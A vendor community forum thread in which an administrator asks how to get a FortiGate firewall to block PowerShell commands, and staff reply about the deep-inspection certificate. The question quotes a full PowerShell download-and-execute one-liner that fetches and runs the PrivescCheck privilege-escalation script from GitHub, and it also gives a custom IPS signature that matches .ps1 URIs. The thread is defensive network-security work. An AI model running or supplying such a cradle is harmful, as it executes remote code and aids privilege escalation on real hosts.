Skip to main content
AUT_Maverick
AUT_Maverick
Visitor III
July 3, 2023
Question

fortigate block powershell

  • July 3, 2023
  • 1 reply
  • 2405 views

Hello Guys,

I have a simple Question how can i block Windows Powershell commands like this:

I created a Firewall Policy where Source is my Test Client and moved Policy before Rule #1 and activated DPI + Application Control + selected Windows.Powershell Action block in the Application Control Profile. What did i do wrong? When i visit the website "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1" manually with the browser I see that i have the fortigate ssl cert instead of the github one.

Also in FortiAnalyzer the log tells me that traffic to raw.githubusercontent.com goes via my newly created policy. Under Application in the log there is only the application HTTP.BROWSER but not Powershell.

iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1');Invoke-PrivescCheck -Extended -Report PrivescCheck -Format TXT,HTML

 

Edited1: I found a workaround for the ps1 file. I created a custom IPS Signature which scans uri for .ps1 like this:

F-SBID( --revision 1; --attack_id 8614; --name "BlockPS1"; --service HTTP; --protocol tcp; --pattern ".ps1"; --context uri; --no_case; --flow from_client;)

1 reply

abarushka
Staff
abarushka
Staff
July 5, 2023

Hello,

 

I suspect that you get FortiGate deep inspection default certificate, since the traffic was blocked by FortiGate and replacement message was generated using FortiGate deep inspection default certificate.

Terms & ConditionsAccessibility statement